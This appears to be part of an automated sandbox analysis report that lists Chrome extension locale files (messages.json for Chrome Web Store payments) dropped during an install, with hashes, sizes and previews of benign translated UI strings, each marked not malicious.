SSDEEP:
MD5:	96C8CBD161D3CE9CB1A46CB2CD0C6583
SHA1:	78BBFCF035B5B620E353C8E520653ADD3F4E7DB8
SHA-256:	81D8F1D9F72B3139BC5D9845BCF82990308FB6175D07514D8238B1E6D5D02E8A
SHA-512:	692468B7B44D961D8248BBC30CC11DE9F3F7E89D01A609E6CB71CAF653D8212C15DFA834C5FB6E8261FD21A25E9616861C0A3FC01DB27CBBE79C3FDE2C6549DD
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\u30a2\u30d7\u30ea\u306f\u73fe\u5728\u3054\u5229\u7528\u3044\u305f\u3060\u3051\u307e\u305b\u3093\u3002"},"craw_connect_to_network":{"message":"\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u306b\u63a5\u7d9a\u3057\u3066\u304f\u3060\u3055\u3044\u3002"},"app_name":{"message":"Chrome \u30a6\u30a7\u30d6\u30b9\u30c8\u30a2\u6c7a\u6e08"},"app_description":{"message":"Chrome \u30a6\u30a7\u30d6\u30b9\u30c8\u30a2\u6c7a\u6e08"},"iap_unavailable":{"message":"\u30a2\u30d7\u30ea\u5185\u30da\u30a4\u30e1\u30f3\u30c8\u306f\u73fe\u5728\u3054\u5229\u7528\u3044\u305f\u3060\u3051\u307e\u305b\u3093\u3002"},"please_sign_in":{"message":"Chrome \u306b\u30ed\u30b0\u30a4\u30f3\u3057\u3066\u304f\u3060\u3055\u3044\u3002"},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	656
Entropy (8bit):	4.88216622785951
Encrypted:	false
SSDEEP:
MD5:	3CAF23A8EA2332D78B725B6C99EC3202
SHA1:	95C3504F55A929449EF2E3AB92014562AACD39AD
SHA-256:	BFE72BBC492B9018A599CB6575366696E431E6A38400E4B2ED06EAE3340D3AE5
SHA-512:	C000FCCB567D3590D4C401005E78C539961455BB13686296EC4FF7018BB0A4DAB2DA96FBDAA33D999C1409B5796932370219B3FF8490B671586DEBD6145519D6
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\ud604\uc7ac \uc571\uc744 \uc0ac\uc6a9\ud560 \uc218 \uc5c6\uc2b5\ub2c8\ub2e4."},"craw_connect_to_network":{"message":"\ub124\ud2b8\uc6cc\ud06c\uc5d0 \uc5f0\uacb0\ud558\uc138\uc694."},"app_name":{"message":"Chrome \uc6f9 \uc2a4\ud1a0\uc5b4 \uacb0\uc81c"},"app_description":{"message":"Chrome \uc6f9 \uc2a4\ud1a0\uc5b4 \uacb0\uc81c"},"iap_unavailable":{"message":"\ud604\uc7ac \uc778\uc571 \uacb0\uc81c\ub97c \uc0ac\uc6a9\ud560 \uc218 \uc5c6\uc2b5\ub2c8\ub2e4."},"please_sign_in":{"message":"Chrome\uc5d0 \ub85c\uadf8\uc778\ud558\uc138\uc694."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	576
Entropy (8bit):	4.846810495221701
Encrypted:	false
SSDEEP:
MD5:	41F2D63952202E528DBBB683B480F99C
SHA1:	9DD998542DBE6609299D4A5A25364A32FA7D7865
SHA-256:	FF7C083CD1E6134DD8263C634336EB852274BAD1BFAD18762814C42BC65309D8
SHA-512:	7BD2E2D4264C6BD62DF2584F3C1D3A910C5C5A28F4532F1E8F0C2235E93714EDD6074EA24960D4DEB4F9125DA81CA813F06330EFF66FA8DF1552D1DAC686441E
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Programa \u0161iuo metu negalima."},"craw_connect_to_network":{"message":"Prisijunkite prie tinklo."},"app_name":{"message":"\u201eChrome\u201c internetin\u0117s parduotuv\u0117s mok\u0117jimo sistema"},"app_description":{"message":"\u201eChrome\u201c internetin\u0117s parduotuv\u0117s mok\u0117jimo sistema"},"iap_unavailable":{"message":"Mok\u0117jimai programoje \u0161iuo metu negalimi."},"please_sign_in":{"message":"Prisijunkite prie \u201eChrome\u201c."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	584
Entropy (8bit):	4.856464171821628
Encrypted:	false
SSDEEP:
MD5:	1D21ED2D46338636E24401F6E56E326F
SHA1:	24497EDB25724BC4A57823C5CD06F50DB9647DD4
SHA-256:	434A375C32B8A21C435511C551F740FD4D170EC528A8F4EFC3D798EA4A07B606
SHA-512:	10A870718CC6281EE09DE01900D303B06589D9281C5849D6105C6FCF58BFFA3855F29C6ECA3689FFE6EF304BABCF41C5700EE2D8AFE711D57CB711194366FA6A
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Lietotne pagaid\u0101m nav pieejama."},"craw_connect_to_network":{"message":"L\u016bdzu, izveidojiet savienojumu ar t\u012bklu."},"app_name":{"message":"Chrome interneta veikala maks\u0101jumu sist\u0113ma"},"app_description":{"message":"Chrome interneta veikala maks\u0101jumu sist\u0113ma"},"iap_unavailable":{"message":"Maks\u0101jumi lietotn\u0113s pa\u0161laik nav pieejami."},"please_sign_in":{"message":"L\u016bdzu, pierakstieties p\u0101rl\u016bk\u0101 Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\nb\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	501
Entropy (8bit):	4.804937629013952
Encrypted:	false
SSDEEP:
MD5:	8F0168B9A546D5A99FD8A262C975C80E
SHA1:	B0718071BD0B7251D4459E9C87DF50C14622FBD6
SHA-256:	F03FA7384DF79EBA6E0274D570996030F595A3BF6B781929DD9DB6593262E41F
SHA-512:	A1191CDC496DDD7470BDCFAF186BB9488767159E0CA6A6242D195FA3351704DC8F8BBD03DBEE57D37BBD897C9E8D14B7325FB37D58AC80DEC0F972FF893758B8
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Appen er utilgjengelig for \u00f8yeblikket."},"craw_connect_to_network":{"message":"Du m\u00e5 koble til et nettverk."},"app_name":{"message":"Chrome Nettmarked-betalinger"},"app_description":{"message":"Chrome Nettmarked-betalinger"},"iap_unavailable":{"message":"Betaling i app er ikke tilgjengelig for \u00f8yeblikket."},"please_sign_in":{"message":"Du m\u00e5 logge p\u00e5 Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	472
Entropy (8bit):	4.651254944398292
Encrypted:	false
SSDEEP:
MD5:	E7F74DCE7B6411E4E0D95E9252CF74FA
SHA1:	33CC6C73C5F8D0144C0260C2E5A9BD0DB3EF6477
SHA-256:	3564AEF46C01602B19CC29FD8A79676C543427EDE98206D0C91B33AF0CCF3977
SHA-512:	B0987002F8BC4F0B0AC41A87E90BA729464BF2F34D1CC413DD3837019F5F37FD46EB9E9FDABB97F5BDCB50768ABF808AF6E7C531CD7BCA477C71990D2F13335B
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"App momenteel niet beschikbaar."},"craw_connect_to_network":{"message":"Maak verbinding met een netwerk."},"app_name":{"message":"Betalingen via Chrome Web Store"},"app_description":{"message":"Betalingen via Chrome Web Store"},"iap_unavailable":{"message":"In-app-betalingen is momenteel niet beschikbaar."},"please_sign_in":{"message":"Log in bij Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	549
Entropy (8bit):	4.978056737225237
Encrypted:	false
SSDEEP:
MD5:	E16649D87E4CA6462192CF78EBE543EC
SHA1:	53097D592B13F3C1370366B25024EA72208B136A
SHA-256:	EB435F7460A63576CA1ECB51948E7A3AD5168D2F175AE2B5836D469672923D84
SHA-512:	6EC702CEC6E312CAC6F33109A57F7D83A3F073F2F9A9BD42DB0F91A36F87D800EEB978C69023B6A0E00B86ECE3E1024C269F89D038F0926619F40D075F6689DD
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Aplikacja jest obecnie niedost\u0119pna."},"craw_connect_to_network":{"message":"Po\u0142\u0105cz si\u0119 z sieci\u0105."},"app_name":{"message":"P\u0142atno\u015bci w sklepie Chrome Web Store"},"app_description":{"message":"P\u0142atno\u015bci w sklepie Chrome Web Store"},"iap_unavailable":{"message":"P\u0142atno\u015bci w ramach aplikacji s\u0105 teraz niedost\u0119pne."},"please_sign_in":{"message":"Zaloguj si\u0119 w Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	513
Entropy (8bit):	4.734605177119403
Encrypted:	false
SSDEEP:
MD5:	1F4BC8A5EFD59D61127ABEECD4B6CAE3
SHA1:	8647B4D2D643AE4F784ABDDC50D87A39AD02971A
SHA-256:	E1950CBBF056F068EA56160DDB318F3E6232BFBBE096D221C7CA6FCAACE2A8B9
SHA-512:	B58A95BBBC0A16B06826684198B481D2E15A7C760956721C3B538C62C902873A7856F328506457EE66311E45D7A16A4AAAC85B12853AA7EF09780189D28EB3DE
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Aplicativo indispon\u00edvel no momento."},"craw_connect_to_network":{"message":"Conecte-se a uma rede."},"app_name":{"message":"Pagamentos da Chrome Web Store"},"app_description":{"message":"Pagamentos da Chrome Web Store"},"iap_unavailable":{"message":"No momento, os Pagamentos no aplicativo n\u00e3o est\u00e3o dispon\u00edveis."},"please_sign_in":{"message":"Fa\u00e7a login no Google Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	503
Entropy (8bit):	4.742240430473613
Encrypted:	false
SSDEEP:
MD5:	D80ECE7E4B3741CD9CD29B89D006B864
SHA1:	8F0D587B78E36861ED00524ABF886FA20E14CAE4
SHA-256:	C8FF9ACAEA1D3B6F8483339CB40F66BC563CCA8DD87F2337F813C492B20F451B
SHA-512:	8A53D9618BBD1A62CD48501E5620932631C1B045612082D99429628D2BF4409AEE3FA695107E82037B5CB332111C456CF3A74235C66B61380CF1E382914F1088
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Aplica\u00e7\u00e3o atualmente indispon\u00edvel."},"craw_connect_to_network":{"message":"Ligue-se a uma rede."},"app_name":{"message":"Pagamentos via Chrome Web Store"},"app_description":{"message":"Pagamentos via Chrome Web Store"},"iap_unavailable":{"message":"Os Pagamentos na app est\u00e3o atualmente indispon\u00edveis."},"please_sign_in":{"message":"Inicie sess\u00e3o no Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	554
Entropy (8bit):	4.8596885592394505
Encrypted:	false
SSDEEP:
MD5:	D63E66B94A4EA2085D80E76209582FB1
SHA1:	4ECAC3EB64DD6253310A0776E6D42257FC290D77
SHA-256:	91A5AAD210C3E0241106E8821B3897EDEFEC9D85033C94DB2324FF3A5FDE5AC7
SHA-512:	09AC34CF286FD0730EED4F6DB3E2FD00A026D0F42DCC75AE49B045DDAD38DFA38B0FB7823ECAC8B0A9BC2A89F4EAF4BCE081779F2ECDF6CC39286045577DC5C9
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\u00cen prezent, aplica\u021bia nu este disponibil\u0103."},"craw_connect_to_network":{"message":"Conecteaz\u0103-te la o re\u021bea."},"app_name":{"message":"Pl\u0103\u021bi prin Magazinul web Chrome"},"app_description":{"message":"Pl\u0103\u021bi prin Magazinul web Chrome"},"iap_unavailable":{"message":"Pl\u0103\u021bile \u00een aplica\u021bie nu sunt disponibile momentan."},"please_sign_in":{"message":"Conecteaz\u0103-te la Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	1165
Entropy (8bit):	4.224419823550506
Encrypted:	false
SSDEEP:
MD5:	22F9E62ABAD82C2190A839851245A495
SHA1:	E7F79BD875918F0D0799DB5F45FAC6297FB66AF7
SHA-256:	9FC1167626C97BCBFDAFF23C6033A44252F89A501AF1DF41C43CB3A994FEB09F
SHA-512:	F577F2F0C344C4E4050AF025A9FB9AC78CADF7FE177F63AB9863826A9808B7FBF5D3363E3B61D7A6DB083EF5EBAC5474D710347B701640AB9C229A3E5D1F0A48
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\u041f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e."},"craw_connect_to_network":{"message":"\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u0441\u044c \u043a \u0441\u0435\u0442\u0438."},"app_name":{"message":"\u041f\u043b\u0430\u0442\u0435\u0436\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0430 Chrome"},"app_description":{"message":"\u041f\u043b\u0430\u0442\u0435\u0436\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0430 Chrome"},"iap_unavailable":{"message":"\u041f\u043b\u0430\u0442\u0435\u0436\u0438 \u0447\u0435\u0440\u0435\u0437 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b."},"

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	548
Entropy (8bit):	4.850036636276313
Encrypted:	false
SSDEEP:
MD5:	4BBAA10FD00AADBBA3EF6E805E8E1A62
SHA1:	1991901BD6A20C4A7977F09DF30C0CFF0524C504
SHA-256:	906C4F7FDDE15DE4C841E7910BBF14D9175E894BCB244B56E8447A5ADFA5B7AB
SHA-512:	3490F8826E3DB0C8B4FE7B1866DA27F6585ADF52E74392A592A60A916E8A784FF7B92B3DE8985084546D663588369D9BB03FCB25196B7F9C6DF607BEB7DEF010
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Aplik\u00e1cia moment\u00e1lne nie je dostupn\u00e1."},"craw_connect_to_network":{"message":"Pripojte sa k sieti."},"app_name":{"message":"Platby Internetov\u00e9ho obchodu Chrome"},"app_description":{"message":"Platby Internetov\u00e9ho obchodu Chrome"},"iap_unavailable":{"message":"Platby v aplik\u00e1cii moment\u00e1lne nie s\u00fa k dispoz\u00edcii."},"please_sign_in":{"message":"Prihl\u00e1ste sa do prehliada\u010da Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	494
Entropy (8bit):	4.7695148367588285
Encrypted:	false
SSDEEP:
MD5:	F45DE58765A37FD095319D7DEB0F2FB6
SHA1:	B585A485C9BC1982EDF7AE0B9AC73A8E91D41CB5
SHA-256:	8366774AA582035BC7D949F4E28FAEC371C305D01404DF56FFF5A78B4F6ECDB7
SHA-512:	F86334E6E6F90961AD9C8E7DD1A4E923476249469180AC69D9DE59746FE26FAECB585898FC50310380F20CEB0971CA1EB7B55046DA75276840AEA6BAFF574E66
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Aplikacija trenutno ni na voljo."},"craw_connect_to_network":{"message":"Pove\u017eite se z omre\u017ejem."},"app_name":{"message":"Pla\u010dila v spletni trgovini Chrome"},"app_description":{"message":"Pla\u010dila v spletni trgovini Chrome"},"iap_unavailable":{"message":"Pla\u010dila v aplikacijah trenutno niso na voljo."},"please_sign_in":{"message":"Prijavite se v Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	1152
Entropy (8bit):	4.2078334514915685
Encrypted:	false
SSDEEP:
MD5:	92C1FAC62EB7F92EC3794D4A141BEF32
SHA1:	2AFA41BF51BF9A1089B0B92A9D2DC74299B79813
SHA-256:	9DF154C93B02695AF1CC39F085D9D178EC6AF131A62C2AFC65F125F8F9A5B7AC
SHA-512:	D0709E4F586EAC03548A47D72156CF48D9B4EB9AF9ED8335DF75F541AE1B4172541647EC8BA081965647A9EAE10DB342F87558977BE6075B2D3CC5C3995ED6EE
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\u0410\u043f\u043b\u0438\u043a\u0430\u0446\u0438\u0458\u0430 \u0458\u0435 \u0442\u0440\u0435\u043d\u0443\u0442\u043d\u043e \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0430."},"craw_connect_to_network":{"message":"\u041f\u043e\u0432\u0435\u0436\u0438\u0442\u0435 \u0441\u0430 \u043c\u0440\u0435\u0436\u043e\u043c."},"app_name":{"message":"\u041f\u043b\u0430\u045b\u0430\u045a\u0430 \u0443 Chrome \u0432\u0435\u0431-\u043f\u0440\u043e\u0434\u0430\u0432\u043d\u0438\u0446\u0438"},"app_description":{"message":"\u041f\u043b\u0430\u045b\u0430\u045a\u0430 \u0443 Chrome \u0432\u0435\u0431-\u043f\u0440\u043e\u0434\u0430\u0432\u043d\u0438\u0446\u0438"},"iap_unavailable":{"message":"\u041f\u043b\u0430\u045b\u0430\u045a\u0430 \u0443 \u0430\u043f\u043b\u0438\u043a\u0430\u0446\u0438\u0458\u0438 \u0441\u0443 \u0442\u0440\u0435\u043d\u0443\u0442\u043d\u043e \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0430."},"please_sign_in":{"message":"\u041f\u04

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	523
Entropy (8bit):	4.788896709100935
Encrypted:	false
SSDEEP:
MD5:	6E1BE9CEE29818E54E3D1C7D483DD6F7
SHA1:	B9DD926B60E225C5BE8A1DBB7EF3ACE422A204A9
SHA-256:	E348583D8C53F4A5DEC4551DA93785C17108466E427E06F84708AA383EA0E326
SHA-512:	3ADB32C0F098E064B774E7E7F615F54C44ADFB3BFC554B06A17048C6077C5885D42BD89F6733D64D65EA1785033B36B386EF0B6661FD539855484EA5A2900BB7
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Appen \u00e4r inte tillg\u00e4nglig f\u00f6r tillf\u00e4llet."},"craw_connect_to_network":{"message":"Anslut till ett n\u00e4tverk."},"app_name":{"message":"Betalning via Chrome Web Store"},"app_description":{"message":"Betalning via Chrome Web Store"},"iap_unavailable":{"message":"Betalning i appen \u00e4r inte tillg\u00e4ngligt f\u00f6r n\u00e4rvarande."},"please_sign_in":{"message":"Logga in i Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	1300
Entropy (8bit):	4.09652661599029
Encrypted:	false
SSDEEP:
MD5:	283D5177FB2FC7082967988E2683EC7C
SHA1:	DEDE43967F3CEF9D9325F140872A63BFCE2AA8C5
SHA-256:	E8D5820BDE31B66A7641068FDEDD1A5F20C1A783460B98887A670F38422099CF
SHA-512:	74413C00C58B7136038D4C41D5C7C79EC02A9830779ABB719D72536B74C5E338B1548A20290559FB3F4E2A938B728CF99041050DD1970848EE9A6590EB0AB3E4
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e43\u0e0a\u0e49\u0e07\u0e32\u0e19\u0e41\u0e2d\u0e1b\u0e44\u0e14\u0e49\u0e43\u0e19\u0e02\u0e13\u0e30\u0e19\u0e35\u0e49"},"craw_connect_to_network":{"message":"\u0e42\u0e1b\u0e23\u0e14\u0e40\u0e0a\u0e37\u0e48\u0e2d\u0e21\u0e15\u0e48\u0e2d\u0e01\u0e31\u0e1a\u0e40\u0e04\u0e23\u0e37\u0e2d\u0e02\u0e48\u0e32\u0e22"},"app_name":{"message":"\u0e23\u0e30\u0e1a\u0e1a\u0e0a\u0e33\u0e23\u0e30\u0e40\u0e07\u0e34\u0e19\u0e02\u0e2d\u0e07 Chrome \u0e40\u0e27\u0e47\u0e1a\u0e2a\u0e42\u0e15\u0e23\u0e4c"},"app_description":{"message":"\u0e23\u0e30\u0e1a\u0e1a\u0e0a\u0e33\u0e23\u0e30\u0e40\u0e07\u0e34\u0e19\u0e02\u0e2d\u0e07 Chrome \u0e40\u0e27\u0e47\u0e1a\u0e2a\u0e42\u0e15\u0e23\u0e4c"},"iap_unavailable":{"message":"\u0e23\u0e30\u0e1a\u0e1a\u0e0a\u0e33\u0e23\u0e30\u0e40\u0e07\u0e34\u0e19\u0e43\u0e19\u0e41\u0e2d\u0e1b\u0e1e\u0e25\u0e34\u0e40\u0e04\u0e0a\u0e31\u0e19\u0e44\u0e21\u0e48\u0e1e\u0e23\u0e49\u0e2d\u0e21\u0e4

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	572
Entropy (8bit):	4.93347615778905
Encrypted:	false
SSDEEP:
MD5:	1BF2AA4BB904B406C9C2B7DF769BB540
SHA1:	8D29C4B7A79AB0657747CA194D1934292A46D2A8
SHA-256:	0F2E8285BA3E2BDBA6B16435FB941B07159AACFAC80196AD5941B79AB52B712A
SHA-512:	0DF48AE0A518A940489E91D8A0D6E7E47A3153747358E06CD792BFA3D826F47FA1502268F602E7D7EDFC1C111AEB3FAF0E67F845986DDA77E2FC4B3336BCF46C
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Uygulama \u015fu anda kullan\u0131lam\u0131yor."},"craw_connect_to_network":{"message":"L\u00fctfen bir a\u011fa ba\u011flan\u0131n."},"app_name":{"message":"Chrome Web Ma\u011fazas\u0131 \u00d6demeleri"},"app_description":{"message":"Chrome Web Ma\u011fazas\u0131 \u00d6demeleri"},"iap_unavailable":{"message":"Uygulama \u0130\u00e7i \u00d6demeler \u015fu anda kullan\u0131lamaz."},"please_sign_in":{"message":"L\u00fctfen Chrome'da oturum a\u00e7\u0131n."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	1088
Entropy (8bit):	4.268588181103308
Encrypted:	false
SSDEEP:
MD5:	FD1C9890679036E1AD914218753B1E8E
SHA1:	58160F7A0FC94110A2876223E406A517C8E2660B
SHA-256:	39D19CC3387FFCE13A8F11DAD72E2FCBB7CD1A4367EC699AD7C40D6F52ECE717
SHA-512:	03E81C398EE6A5DC65A40CA07E1A4CBEC2662D2C151A76C9ECB813587D672AC71311C39C5C5DA8A1AE78A3A6CE3938609D1365F7819424FC34289C7743DF00D2
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\u041f\u0440\u043e\u0433\u0440\u0430\u043c\u0430 \u0442\u0438\u043c\u0447\u0430\u0441\u043e\u0432\u043e \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0430."},"craw_connect_to_network":{"message":"\u041f\u0456\u0434\u2019\u0454\u0434\u043d\u0430\u0439\u0442\u0435\u0441\u044f \u0434\u043e \u043c\u0435\u0440\u0435\u0436\u0456."},"app_name":{"message":"\u041f\u043b\u0430\u0442\u0435\u0436\u0456 \u0412\u0435\u0431-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0443 Chrome"},"app_description":{"message":"\u041f\u043b\u0430\u0442\u0435\u0436\u0456 \u0412\u0435\u0431-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0443 Chrome"},"iap_unavailable":{"message":"\u041f\u043b\u0430\u0442\u0435\u0436\u0456 \u0447\u0435\u0440\u0435\u0437 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u0443 \u0437\u0430\u0440\u0430\u0437 \u043d\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0456."},"please_sign_in":{"message":"\u0423\u0432\u0456\u0439\u0434\u0456\u0442\u044c \u0443

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\vi\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	671
Entropy (8bit):	4.846531831162704
Encrypted:	false
SSDEEP:
MD5:	7D52E9357AB847B4CC8DBC8CC4DA93F5
SHA1:	AF877F3992D8056C8F08462BD575595BF79FE5B0
SHA-256:	313F71F3FFDCEFC76FC746FF2029FBF8FBE38BD83DCF952FC3DDCD8AA96D5CFB
SHA-512:	E66E7FACDF35A0F72AC61DEAAEC43A2DAC976CADEA146EBE3E90E739178F173E32ADCF909F05F2657F2AD66E2ECB6015F6733CEA4B9E42337246469F89D3A12F
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\u1ee8ng d\u1ee5ng hi\u1ec7n kh\u00f4ng kh\u1ea3 d\u1ee5ng."},"craw_connect_to_network":{"message":"Vui l\u00f2ng k\u1ebft n\u1ed1i v\u1edbi m\u1ea1ng."},"app_name":{"message":"Thanh to\u00e1n tr\u00ean c\u1eeda h\u00e0ng Chrome tr\u1ef1c tuy\u1ebfn"},"app_description":{"message":"Thanh to\u00e1n tr\u00ean c\u1eeda h\u00e0ng Chrome tr\u1ef1c tuy\u1ebfn"},"iap_unavailable":{"message":"Thanh to\u00e1n trong \u1ee9ng d\u1ee5ng hi\u1ec7n kh\u00f4ng kh\u1ea3 d\u1ee5ng."},"please_sign_in":{"message":"Vui l\u00f2ng \u0111\u0103ng nh\u1eadp v\u00e0o Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	602
Entropy (8bit):	4.917339139635893
Encrypted:	false
SSDEEP:
MD5:	393680A09DEE0CB9046A62BDC0750B74
SHA1:	54E7F8215061A4AB241B87AE4E81C8F860EB2C2B
SHA-256:	D5FB52C2897FD5C294784DB63C933AC77C609D10AC91431CCB295D87452CBEE6
SHA-512:	14C214CAEFC69B085E918F492C75E2A48BC6A9C2D347D29403B26E69A474825E302A3E106710E5C04E047BD57EE684A67846A5DE956705FFBF41BB0614B8CEB2
Malicious:	false
Reputation:	unknown
